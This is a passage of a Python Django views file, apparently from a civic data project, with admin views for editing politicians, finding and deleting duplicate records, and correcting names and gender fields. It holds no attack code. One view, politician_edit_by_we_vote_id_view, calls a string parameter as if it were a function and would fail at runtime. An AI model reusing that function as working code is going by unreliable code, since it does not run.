'politician_twitter_handle2': politician_twitter_handle2,\n 'politician_twitter_handle3': politician_twitter_handle3,\n 'politician_twitter_handle4': politician_twitter_handle4,\n 'politician_twitter_handle5': politician_twitter_handle5,\n 'politician_url': politician_url,\n 'politician_url2': politician_url2,\n 'politician_url3': politician_url3,\n 'politician_url4': politician_url4,\n 'politician_url5': politician_url5,\n 'political_party': political_party,\n 'ballot_guide_official_statement': ballot_guide_official_statement,\n 'vote_smart_id': vote_smart_id,\n 'maplight_id': maplight_id,\n 'politician_we_vote_id': politician_we_vote_id,\n }\n return render(request, 'politician/politician_edit.html', template_values)\n\n\n@login_required\ndef politician_delete_all_duplicates_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n state_code = request.GET.get('state_code', '')\n if positive_value_exists(state_code):\n queryset = PoliticiansArePossibleDuplicates.objects.filter(\n state_code__iexact=state_code,\n )\n queryset.delete()\n messages.add_message(request, messages.INFO, 'Duplicate politician data deleted.')\n else:\n messages.add_message(request, messages.INFO, 'Duplicate politician data NOT deleted. State code missing.')\n return HttpResponseRedirect(reverse('politician:duplicates_list', args=()) +\n \"?state_code=\" + str(state_code))\n\n\n@login_required\ndef politician_duplicates_list_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'partner_organization', 'political_data_viewer', 'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n messages_on_stage = get_messages(request)\n state_code = request.GET.get('state_code', '')\n politician_search = request.GET.get('politician_search', '')\n google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))\n show_all = positive_value_exists(request.GET.get('show_all', False))\n show_related_candidates = positive_value_exists(request.GET.get('show_related_candidates', False))\n show_politicians_with_email = request.GET.get('show_politicians_with_email', False)\n\n duplicates_list = []\n duplicates_list_count = 0\n possible_duplicates_count = 0\n state_list = STATE_CODE_MAP\n sorted_state_list = sorted(state_list.items())\n\n try:\n queryset = PoliticiansArePossibleDuplicates.objects.using('readonly').all()\n if positive_value_exists(state_code):\n queryset = queryset.filter(state_code__iexact=state_code)\n duplicates_list_count = queryset.count()\n queryset = queryset.exclude(\n Q(politician2_we_vote_id__isnull=True) | Q(politician2_we_vote_id=''))\n possible_duplicates_count = queryset.count()\n if not positive_value_exists(show_all):\n duplicates_list = list(queryset[:200])\n else:\n duplicates_list = list(queryset[:1000])\n except ObjectDoesNotExist:\n # This is fine\n pass\n\n # Attach candidates linked to these politicians\n politicians_to_display_we_vote_id_list = []\n for one_duplicate in duplicates_list:\n if positive_value_exists(one_duplicate.politician1_we_vote_id):\n politicians_to_display_we_vote_id_list.append(one_duplicate.politician1_we_vote_id)\n if positive_value_exists(one_duplicate.politician2_we_vote_id):\n politicians_to_display_we_vote_id_list.append(one_duplicate.politician2_we_vote_id)\n\n politicians_dict = {}\n try:\n queryset = Politician.objects.using('readonly').all()\n queryset = queryset.filter(we_vote_id__in=politicians_to_display_we_vote_id_list)\n politician_data_list = list(queryset)\n for one_politician in politician_data_list:\n politicians_dict[one_politician.we_vote_id] = one_politician\n except Exception as e:\n pass\n\n duplicates_list_modified = []\n for one_duplicate in duplicates_list:\n if positive_value_exists(one_duplicate.politician1_we_vote_id) \\\n and one_duplicate.politician1_we_vote_id in politicians_dict \\\n and positive_value_exists(one_duplicate.politician2_we_vote_id) \\\n and one_duplicate.politician2_we_vote_id in politicians_dict:\n one_duplicate.politician1 = politicians_dict[one_duplicate.politician1_we_vote_id]\n one_duplicate.politician2 = politicians_dict[one_duplicate.politician2_we_vote_id]\n duplicates_list_modified.append(one_duplicate)\n else:\n possible_duplicates_count -= 1\n\n messages.add_message(request, messages.INFO,\n \"Politicians analyzed: {duplicates_list_count:,}. \"\n \"Possible duplicate politicians found: {possible_duplicates_count:,}. \"\n \"State: {state_code}\"\n \"\".format(\n duplicates_list_count=duplicates_list_count,\n possible_duplicates_count=possible_duplicates_count,\n state_code=state_code))\n\n template_values = {\n 'messages_on_stage': messages_on_stage,\n 'google_civic_election_id': google_civic_election_id,\n 'duplicates_list': duplicates_list_modified,\n 'politician_search': politician_search,\n 'show_all': show_all,\n 'show_politicians_with_email': show_politicians_with_email,\n 'show_related_candidates': show_related_candidates,\n 'state_code': state_code,\n 'state_list': sorted_state_list,\n }\n return render(request, 'politician/politician_duplicates_list.html', template_values)\n\n\n@login_required\ndef politician_edit_by_we_vote_id_view(request, politician_we_vote_id):\n politician_manager = PoliticianManager()\n politician_id = politician_manager.fetch_politician_id_from_we_vote_id(politician_we_vote_id)\n return politician_we_vote_id(request, politician_id)\n\n\n@login_required\ndef politician_edit_view(request, politician_id=0, politician_we_vote_id=''):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n # These variables are here because there was an error on the edit_process_view and the voter needs to try again\n ballotpedia_politician_url = request.GET.get('ballotpedia_politician_url', False)\n facebook_url = request.GET.get('facebook_url', False)\n facebook_url2 = request.GET.get('facebook_url2', False)\n facebook_url3 = request.GET.get('facebook_url3', False)\n google_civic_candidate_name = request.GET.get('google_civic_candidate_name', False)\n google_civic_candidate_name2 = request.GET.get('google_civic_candidate_name2', False)\n google_civic_candidate_name3 = request.GET.get('google_civic_candidate_name3', False)\n instagram_handle = request.GET.get('instagram_handle', False)\n if positive_value_exists(instagram_handle):\n instagram_handle = extract_instagram_handle_from_text_string(instagram_handle)\n politician_contact_form_url = request.GET.get('politician_contact_form_url', False)\n politician_email = request.GET.get('politician_email', False)\n politician_email2 = request.GET.get('politician_email2', False)\n politician_email3 = request.GET.get('politician_email3', False)\n politician_name = request.GET.get('politician_name', False)\n politician_phone_number = request.GET.get('politician_phone_number', False)\n politician_phone_number2 = request.GET.get('politician_phone_number2', False)\n politician_phone_number3 = request.GET.get('politician_phone_number3', False)\n politician_twitter_handle = request.GET.get('politician_twitter_handle', False)\n politician_twitter_handle2 = request.GET.get('politician_twitter_handle2', False)\n politician_twitter_handle3 = request.GET.get('politician_twitter_handle3', False)\n politician_twitter_handle4 = request.GET.get('politician_twitter_handle4', False)\n politician_twitter_handle5 = request.GET.get('politician_twitter_handle5', False)\n politician_url = request.GET.get('politician_url', False)\n politician_url2 = request.GET.get('politician_url2', False)\n politician_url3 = request.GET.get('politician_url3', False)\n politician_url4 = request.GET.get('politician_url4', False)\n politician_url5 = request.GET.get('politician_url5', False)\n political_party = request.GET.get('political_party', False)\n state_code = request.GET.get('state_code', False)\n status = ''\n vote_smart_id = request.GET.get('vote_smart_id', False)\n maplight_id = request.GET.get('maplight_id', False)\n\n messages_on_stage = get_messages(request)\n politician_id = convert_to_int(politician_id)\n politician_on_stage_found = False\n politician_on_stage = Politician()\n\n try:\n if positive_value_exists(politician_id):\n politician_on_stage = Politician.objects.get(id=politician_id)\n politician_we_vote_id = politician_on_stage.we_vote_id\n else:\n politician_on_stage = Politician.objects.get(we_vote_id=politician_we_vote_id)\n politician_id = politician_on_stage.id\n politician_on_stage_found = True\n except Politician.MultipleObjectsReturned as e:\n handle_record_found_more_than_one_exception(e, logger=logger)\n except Politician.DoesNotExist:\n # This is fine, create new below\n pass\n\n if politician_on_stage_found:\n # Generate a CampaignX entry for this politician if one does not exist\n if not positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n results = generate_campaignx_for_politician(\n politician=politician_on_stage,\n save_individual_politician=True,\n )\n politician_on_stage = results['politician']\n\n # Working with Vote Smart data\n rating_list = []\n vote_smart_turned_on = False\n if vote_smart_turned_on:\n try:\n vote_smart_politician_id = politician_on_stage.vote_smart_id\n rating_list_query = VoteSmartRatingOneCandidate.objects.order_by('-timeSpan') # Desc order\n rating_list = rating_list_query.filter(candidateId=vote_smart_politician_id)\n except VotesmartApiError as error_instance:\n # Catch the error message coming back from Vote Smart and pass it in the status\n error_message = error_instance.args\n status = \"EXCEPTION_RAISED: {error_message}\".format(error_message=error_message)\n print_to_log(logger=logger, exception_message_optional=status)\n rating_list = []\n\n # ##################################\n # Show the seo friendly paths for this politician\n path_count = 0\n path_list = []\n if positive_value_exists(politician_we_vote_id):\n from politician.models import PoliticianSEOFriendlyPath\n try:\n path_query = PoliticianSEOFriendlyPath.objects.all()\n path_query = path_query.filter(politician_we_vote_id__iexact=politician_we_vote_id)\n path_count = path_query.count()\n path_list = list(path_query[:4])\n except Exception as e:\n status += 'ERROR_RETRIEVING_FROM_PoliticianSEOFriendlyPath: ' + str(e) + ' '\n\n if positive_value_exists(politician_on_stage.seo_friendly_path):\n path_list_modified = []\n for one_path in path_list:\n if politician_on_stage.seo_friendly_path != one_path.final_pathname_string:\n path_list_modified.append(one_path)\n path_list = path_list_modified\n path_list = path_list[:3]\n\n # Working with We Vote Positions\n try:\n politician_position_query = PositionEntered.objects.order_by('stance')\n # As of Aug 2018 we are no longer using PERCENT_RATING\n politician_position_query = politician_position_query.exclude(stance__iexact='PERCENT_RATING')\n politician_position_list = politician_position_query.filter(\n politician_we_vote_id__iexact=politician_on_stage.we_vote_id)\n except Exception as e:\n politician_position_list = []\n\n # Working with Candidate \"children\" of this politician\n try:\n linked_candidate_list = CandidateCampaign.objects.all()\n linked_candidate_list = linked_candidate_list.filter(\n Q(politician_we_vote_id__iexact=politician_on_stage.we_vote_id) |\n Q(politician_id=politician_on_stage.id))\n except Exception as e:\n linked_candidate_list = []\n\n # ##################################\n # Find Candidates to Link to this Politician\n # Finding Candidates that *might* be \"children\" of this politician\n from politician.controllers import find_candidates_to_link_to_this_politician\n related_candidate_list = find_candidates_to_link_to_this_politician(politician=politician_on_stage)\n\n # Find possible duplicate politicians\n duplicate_politician_list = []\n if positive_value_exists(politician_on_stage.politician_name) or \\\n positive_value_exists(politician_on_stage.first_name) or \\\n positive_value_exists(politician_on_stage.last_name) or \\\n positive_value_exists(politician_on_stage.politician_twitter_handle) or \\\n positive_value_exists(politician_on_stage.vote_smart_id):\n try:\n duplicate_politician_list = Politician.objects.all()\n duplicate_politician_list = duplicate_politician_list.exclude(\n we_vote_id__iexact=politician_on_stage.we_vote_id)\n\n filters = []\n if positive_value_exists(politician_on_stage.politician_name):\n new_filter = Q(politician_name__icontains=politician_on_stage.politician_name)\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.first_name) or \\\n positive_value_exists(politician_on_stage.last_name):\n new_filter = Q(first_name__icontains=politician_on_stage.first_name) & \\\n Q(last_name__icontains=politician_on_stage.last_name)\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle2):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle2)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle3):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle3)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle4):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle4) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle4) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle4) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle4) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle4)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle5):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle5)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.vote_smart_id):\n new_filter = Q(vote_smart_id=politician_on_stage.vote_smart_id)\n filters.append(new_filter)\n\n politician_on_stage.politician_name_normalized = ''\n if positive_value_exists(politician_on_stage.politician_name):\n raw = politician_on_stage.politician_name\n cnt = sum(1 for c in raw if c.isupper())\n if cnt > 5:\n humanized = display_full_name_with_correct_capitalization(raw)\n humanized_cleaned = humanized.replace('(', '').replace(')', '')\n politician_on_stage.politician_name_normalized = string.capwords(humanized_cleaned)\n\n # Add the first query\n if len(filters):\n final_filters = filters.pop()\n\n # ...and \"OR\" the remaining items in the list\n for item in filters:\n final_filters |= item\n\n duplicate_politician_list = duplicate_politician_list.filter(final_filters)\n\n duplicate_politician_list = duplicate_politician_list.order_by('politician_name')[:20]\n except ObjectDoesNotExist:\n # This is fine, create new\n pass\n\n linked_representative_list = []\n if positive_value_exists(politician_we_vote_id):\n queryset = Representative.objects.using('readonly').all()\n queryset = queryset.filter(politician_we_vote_id__iexact=politician_we_vote_id)\n linked_representative_list = list(queryset)\n\n # ##################################\n # Find Representatives to Link to this Politician\n # Finding Representatives that *might* be \"children\" of this politician\n from politician.controllers import find_representatives_to_link_to_this_politician\n related_representative_list = find_representatives_to_link_to_this_politician(politician=politician_on_stage)\n\n if 'localhost' in WEB_APP_ROOT_URL:\n web_app_root_url = 'https://localhost:3000'\n else:\n web_app_root_url = 'https://quality.WeVote.US'\n template_values = {\n 'ballotpedia_politician_url': ballotpedia_politician_url,\n 'duplicate_politician_list': duplicate_politician_list,\n 'facebook_url': facebook_url,\n 'facebook_url2': facebook_url2,\n 'facebook_url3': facebook_url3,\n 'google_civic_candidate_name': google_civic_candidate_name,\n 'google_civic_candidate_name2': google_civic_candidate_name2,\n 'google_civic_candidate_name3': google_civic_candidate_name3,\n 'instagram_handle': instagram_handle,\n 'linked_candidate_list': linked_candidate_list,\n 'linked_representative_list': linked_representative_list,\n 'maplight_id': maplight_id,\n 'messages_on_stage': messages_on_stage,\n 'path_count': path_count,\n 'path_list': path_list,\n 'politician': politician_on_stage,\n 'politician_email': politician_email,\n 'politician_email2': politician_email2,\n 'politician_email3': politician_email3,\n 'politician_name': politician_name,\n 'politician_phone_number': politician_phone_number,\n 'politician_phone_number2': politician_phone_number2,\n 'politician_phone_number3': politician_phone_number3,\n 'politician_position_list': politician_position_list,\n 'politician_twitter_handle': politician_twitter_handle,\n 'politician_twitter_handle2': politician_twitter_handle2,\n 'politician_twitter_handle3': politician_twitter_handle3,\n 'politician_twitter_handle4': politician_twitter_handle4,\n 'politician_twitter_handle5': politician_twitter_handle5,\n 'politician_contact_form_url': politician_contact_form_url,\n 'politician_url': politician_url,\n 'politician_url2': politician_url2,\n 'politician_url3': politician_url3,\n 'politician_url4': politician_url4,\n 'politician_url5': politician_url5,\n 'political_party': political_party,\n 'rating_list': rating_list,\n 'related_candidate_list': related_candidate_list,\n 'related_representative_list': related_representative_list,\n 'state_code': state_code,\n 'vote_smart_id': vote_smart_id,\n 'web_app_root_url': web_app_root_url,\n }\n else:\n template_values = {\n 'messages_on_stage': messages_on_stage,\n # Incoming variables\n 'vote_smart_id': vote_smart_id,\n }\n return render(request, 'politician/politician_edit.html', template_values)\n\n\n@login_required\ndef politician_not_duplicates_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n politician1_we_vote_id = request.GET.get('politician1_we_vote_id', '')\n politician2_we_vote_id = request.GET.get('politician2_we_vote_id', '')\n state_code = request.GET.get('state_code', '')\n\n politician_manager = PoliticianManager()\n results = politician_manager.update_or_create_politicians_are_not_duplicates(\n politician1_we_vote_id, politician2_we_vote_id)\n if results['success']:\n queryset = PoliticiansArePossibleDuplicates.objects.filter(\n politician1_we_vote_id__iexact=politician1_we_vote_id,\n politician2_we_vote_id__iexact=politician2_we_vote_id,\n )\n queryset.delete()\n\n if not results['new_politicians_are_not_duplicates_created']:\n messages.add_message(request, messages.ERROR, 'Could not save politicians_are_not_duplicates entry: ' +\n results['status'])\n messages.add_message(request, messages.INFO, 'Two politicians marked as not duplicates.')\n return HttpResponseRedirect(reverse('politician:duplicates_list', args=()) +\n \"?state_code=\" + str(state_code))\n\n\ndef politician_change_gender_id_view(changes):\n count = 0\n for change in changes:\n try:\n politician_query = Politician.objects.filter(we_vote_id=change['we_vote_id'])\n politician_query = politician_query\n politician_list = list(politician_query)\n politician = politician_list[0]\n if change['gender'] == 'S': # If set to \"Save Unknown\", then save as \"Unknown\"\n setattr(politician, 'gender', UNKNOWN)\n setattr(politician, 'gender_likelihood', POLITICAL_DATA_MANAGER)\n else:\n setattr(politician, 'gender', change['gender'])\n if 'gender_likelihood' in change:\n try:\n setattr(politician, 'gender_likelihood', change['gender_likelihood'])\n except Exception as err:\n logger.error('politician_change_gender_id gender_likelihood caught: ', err)\n timezone = pytz.timezone(\"America/Los_Angeles\")\n datetime_now = timezone.localize(datetime.now())\n setattr(politician, 'date_last_changed', datetime_now)\n politician.save()\n count += 1\n except Exception as err:\n logger.error('politician_change_gender_id caught: ', err)\n count = -1\n\n return count\n\n\n@login_required\ndef set_missing_gender_ids_view(request):\n \"\"\"\n Process repair imported names form\n https://wevotedeveloper.com:8000/apis/v1/set_missing_gender_ids/?start=0&count=25\n :param request:\n :return:\n \"\"\"\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n start = int(request.GET.get('start', 0))\n count = int(request.GET.get('count', 15))\n show_unknowns = request.GET.get('show_unknowns', True)\n politician_manager = PoliticianManager()\n list_of_people_from_db, number_of_rows = politician_manager.retrieve_politicians_with_no_gender_id(\n start, count, show_unknowns)\n people_list = []\n for person in list_of_people_from_db:\n if not hasattr(person, 'politician_name'):\n continue\n name = person.politician_name\n cleaned = re.sub(\"\\(|\\)|\\\"|\\'\", \" \", name)\n cleaned = re.sub(\"\\s+\", \"+\", cleaned)\n search = 'https://www.google.com/search?q=' + cleaned\n politician_url = \"/politician/{politician_id}/edit\".format(politician_id=person.id)\n politician_state_code = person.state_code.upper() if person.state_code else ''\n politician_political_party = person.political_party.lower().capitalize() if person.political_party else ''\n\n person_item = {\n 'person_name': name,\n 'politician_url': politician_url,\n 'search_url': search,\n 'gender': person.gender,\n 'gender_guess': person.guess,\n 'displayable_guess': person.displayable_guess,\n 'google_civic_candidate_name': person.google_civic_candidate_name,\n 'date_last_updated': person.date_last_updated,\n 'state_code': politician_state_code,\n 'we_vote_id': person.we_vote_id,\n 'we_vote_hosted_profile_image_url_medium': person.we_vote_hosted_profile_image_url_medium,\n 'party': politician_political_party,\n }\n people_list.append(person_item)\n\n template_values = {\n 'number_of_rows': f'{number_of_rows:,}',\n 'people_list': people_list,\n 'index_offset': start,\n 'show_unknowns': show_unknowns,\n 'return_link': '/politician/',\n }\n return render(request, 'politician/politician_gender_id_fix_list.html', template_values)\n\n\ndef politician_change_names(changes):\n count = 0\n for change in changes:\n try:\n politician_query = Politician.objects.filter(we_vote_id=change['we_vote_id'])\n politician_query = politician_query\n politician_list = list(politician_query)\n politician = politician_list[0]\n setattr(politician, 'politician_name', change['name_after'])\n timezone = pytz.timezone(\"America/Los_Angeles\")\n datetime_now = timezone.localize(datetime.now())\n setattr(politician, 'date_last_changed', datetime_now)\n politician.save()\n count += 1\n except Exception as err:\n logger.error('politician_change_names caught: ', err)\n count = -1\n\n return count\n\n\n@login_required\ndef politician_edit_process_view(request):\n \"\"\"\n Process the new or edit politician forms\n :param request:\n :return:\n \"\"\"\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n status = ''\n success = True\n update_message = ''\n\n ballot_guide_official_statement = request.POST.get('ballot_guide_official_statement', False)\n ballotpedia_politician_name = request.POST.get('ballotpedia_politician_name', False)\n ballotpedia_politician_url = request.POST.get('ballotpedia_politician_url', False)\n birth_date = request.POST.get('birth_date', False)\n first_name = request.POST.get('first_name', False)\n gender = request.POST.get('gender', 'False')\n middle_name = request.POST.get('middle_name', False)\n last_name = request.POST.get('last_name', False)\n facebook_url = request.POST.get('facebook_url', False)\n facebook_url2 = request.POST.get('facebook_url2', False)\n facebook_url3 = request.POST.get('facebook_url3', False)\n google_civic_candidate_name = request.POST.get('google_civic_candidate_name', False)\n google_civic_candidate_name2 = request.POST.get('google_civic_candidate_name2', False)\n google_civic_candidate_name3 = request.POST.get('google_civic_candidate_name3', False)\n instagram_handle = request.POST.get('instagram_handle', False)\n if positive_value_exists(instagram_handle):\n instagram_handle = extract_instagram_handle_from_text_string(instagram_handle)\n linkedin_url = request.POST.get('linkedin_url', False)\n maplight_id = request.POST.get('maplight_id', False)\n politician_email = request.POST.get('politician_email', False)\n politician_email2 = request.POST.get('politician_email2', False)\n politician_email3 = request.POST.get('politician_email3', False)\n politician_id = request.POST.get('politician_id', 0)\n politician_id = convert_to_int(politician_id)\n politician_name = request.POST.get('politician_name', False)\n politician_phone_number = request.POST.get('politician_phone_number', False)\n politician_phone_number2 = request.POST.get('politician_phone_number2', False)\n politician_phone_number3 = request.POST.get('politician_phone_number3', False)\n try:\n politician_photo_file = request.FILES['politician_photo_file']\n politician_photo_file_found = True\n except Exception as e:\n politician_photo_file = None\n politician_photo_file_found = False\n politician_photo_file_delete = positive_value_exists(request.POST.get('politician_photo_file_delete', False))\n politician_twitter_handle = request.POST.get('politician_twitter_handle', False)\n if positive_value_exists(politician_twitter_handle):\n politician_twitter_handle = extract_twitter_handle_from_text_string(politician_twitter_handle)\n politician_twitter_handle2 = request.POST.get('politician_twitter_handle2', False)\n if positive_value_exists(politician_twitter_handle2) or politician_twitter_handle2 == '':\n politician_twitter_handle2 = extract_twitter_handle_from_text_string(politician_twitter_handle2)\n politician_twitter_handle3 = request.POST.get('politician_twitter_handle3', False)\n if positive_value_exists(politician_twitter_handle3) or politician_twitter_handle3 == '':\n politician_twitter_handle3 = extract_twitter_handle_from_text_string(politician_twitter_handle3)\n politician_twitter_handle4 = request.POST.get('politician_twitter_handle4', False)\n if positive_value_exists(politician_twitter_handle4) or politician_twitter_handle4 == '':\n politician_twitter_handle4 = extract_twitter_handle_from_text_string(politician_twitter_handle4)\n politician_twitter_handle5 = request.POST.get('politician_twitter_handle5', False)\n if positive_value_exists(politician_twitter_handle5) or politician_twitter_handle5 == '':\n politician_twitter_handle5 = extract_twitter_handle_from_text_string(politician_twitter_handle5)\n politician_contact_form_url = request.POST.get('politician_contact_form_url', False)\n politician_url = request.POST.get('politician_url', False)\n politician_url2 = request.POST.get('politician_url2', False)\n politician_url3 = request.POST.get('politician_url3', False)\n politician_url4 = request.POST.get('politician_url4', False)\n politician_url5 = request.POST.get('politician_url5', False)\n political_party = request.POST.get('political_party', False)\n profile_image_type_currently_active = request.POST.get('profile_image_type_currently_active', False)\n politician_we_vote_id = request.POST.get('politician_we_vote_id', False)\n seo_friendly_path = request.POST.get('seo_friendly_path', False)\n state_code = request.POST.get('state_code', False)\n twitter_handle_updates_failing = request.POST.get('twitter_handle_updates_failing', False)\n twitter_handle_updates_failing = positive_value_exists(twitter_handle_updates_failing)\n twitter_handle2_updates_failing = request.POST.get('twitter_handle2_updates_failing', False)\n twitter_handle2_updates_failing = positive_value_exists(twitter_handle2_updates_failing)\n vote_smart_id = request.POST.get('vote_smart_id', False)\n vote_usa_politician_id = request.POST.get('vote_usa_politician_id', False)\n wikipedia_url = request.POST.get('wikipedia_url', False)\n youtube_url = request.POST.get('youtube_url', False)\n # is_battleground_race_ values taken in below\n\n # Check to see if this politician already exists\n politician_on_stage_found = False\n politician_on_stage = Politician()\n politician_manager = PoliticianManager()\n if positive_value_exists(politician_id):\n try:\n politician_query = Politician.objects.filter(id=politician_id)\n if len(politician_query):\n politician_on_stage = politician_query[0]\n politician_we_vote_id = politician_on_stage.we_vote_id\n politician_on_stage_found = True\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician: ' + str(e))\n success = False\n\n # Check to see if there is a duplicate politician already saved\n existing_politician_found = False\n if not positive_value_exists(politician_id):\n try:\n filter_list = Q()\n\n at_least_one_filter = False\n if positive_value_exists(vote_smart_id):\n at_least_one_filter = True\n filter_list |= Q(vote_smart_id=vote_smart_id)\n if positive_value_exists(maplight_id):\n at_least_one_filter = True\n filter_list |= Q(maplight_id=maplight_id)\n if positive_value_exists(politician_twitter_handle):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle) |\n Q(politician_twitter_handle2=politician_twitter_handle) |\n Q(politician_twitter_handle3=politician_twitter_handle) |\n Q(politician_twitter_handle4=politician_twitter_handle) |\n Q(politician_twitter_handle5=politician_twitter_handle)\n )\n if positive_value_exists(politician_twitter_handle2):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle2) |\n Q(politician_twitter_handle2=politician_twitter_handle2) |\n Q(politician_twitter_handle3=politician_twitter_handle2) |\n Q(politician_twitter_handle4=politician_twitter_handle2) |\n Q(politician_twitter_handle5=politician_twitter_handle2)\n )\n if positive_value_exists(politician_twitter_handle3):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle3) |\n Q(politician_twitter_handle2=politician_twitter_handle3) |\n Q(politician_twitter_handle3=politician_twitter_handle3) |\n Q(politician_twitter_handle4=politician_twitter_handle3) |\n Q(politician_twitter_handle5=politician_twitter_handle3)\n )\n if positive_value_exists(politician_twitter_handle4):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle4) |\n Q(politician_twitter_handle2=politician_twitter_handle4) |\n Q(politician_twitter_handle3=politician_twitter_handle4) |\n Q(politician_twitter_handle4=politician_twitter_handle4) |\n Q(politician_twitter_handle5=politician_twitter_handle4)\n )\n if positive_value_exists(politician_twitter_handle5):\n at_least_one_filter = True\n filter_list |= (\n Q(politician_twitter_handle=politician_twitter_handle5) |\n Q(politician_twitter_handle2=politician_twitter_handle5) |\n Q(politician_twitter_handle3=politician_twitter_handle5) |\n Q(politician_twitter_handle4=politician_twitter_handle5) |\n Q(politician_twitter_handle5=politician_twitter_handle5)\n )\n\n if at_least_one_filter:\n politician_duplicates_query = Politician.objects.filter(filter_list)\n\n if len(politician_duplicates_query):\n existing_politician_found = True\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician: ' + str(e))\n success = False\n\n # We can use the same url_variables with any processing failures below\n url_variables = \"?ballot_guide_official_statement=\" + str(ballot_guide_official_statement) + \\\n \"&ballotpedia_politician_name=\" + str(ballotpedia_politician_name) + \\\n \"&ballotpedia_politician_url=\" + str(ballotpedia_politician_url) + \\\n \"&state_code=\" + str(state_code) + \\\n \"&google_civic_candidate_name=\" + str(google_civic_candidate_name) + \\\n \"&google_civic_candidate_name2=\" + str(google_civic_candidate_name2) + \\\n \"&google_civic_candidate_name3=\" + str(google_civic_candidate_name3) + \\\n \"&instagram_handle=\" + str(instagram_handle) + \\\n \"&politician_contact_form_url=\" + str(politician_contact_form_url) + \\\n \"&politician_name=\" + str(politician_name) + \\\n \"&politician_email=\" + str(politician_email) + \\\n \"&politician_email2=\" + str(politician_email2) + \\\n \"&politician_email3=\" + str(politician_email3) + \\\n \"&politician_phone_number=\" + str(politician_phone_number) + \\\n \"&politician_phone_number2=\" + str(politician_phone_number2) + \\\n \"&politician_phone_number3=\" + str(politician_phone_number3) + \\\n \"&politician_twitter_handle=\" + str(politician_twitter_handle) + \\\n \"&politician_twitter_handle2=\" + str(politician_twitter_handle2) + \\\n \"&politician_twitter_handle3=\" + str(politician_twitter_handle3) + \\\n \"&politician_twitter_handle4=\" + str(politician_twitter_handle4) + \\\n \"&politician_twitter_handle5=\" + str(politician_twitter_handle5) + \\\n \"&politician_url=\" + str(politician_url) + \\\n \"&politician_url2=\" + str(politician_url2) + \\\n \"&politician_url3=\" + str(politician_url3) + \\\n \"&politician_url4=\" + str(politician_url4) + \\\n \"&politician_url5=\" + str(politician_url5) + \\\n \"&politician_we_vote_id=\" + str(politician_we_vote_id) + \\\n \"&political_party=\" + str(political_party) + \\\n \"&vote_smart_id=\" + str(vote_smart_id) + \\\n \"&maplight_id=\" + str(maplight_id)\n\n if not success:\n 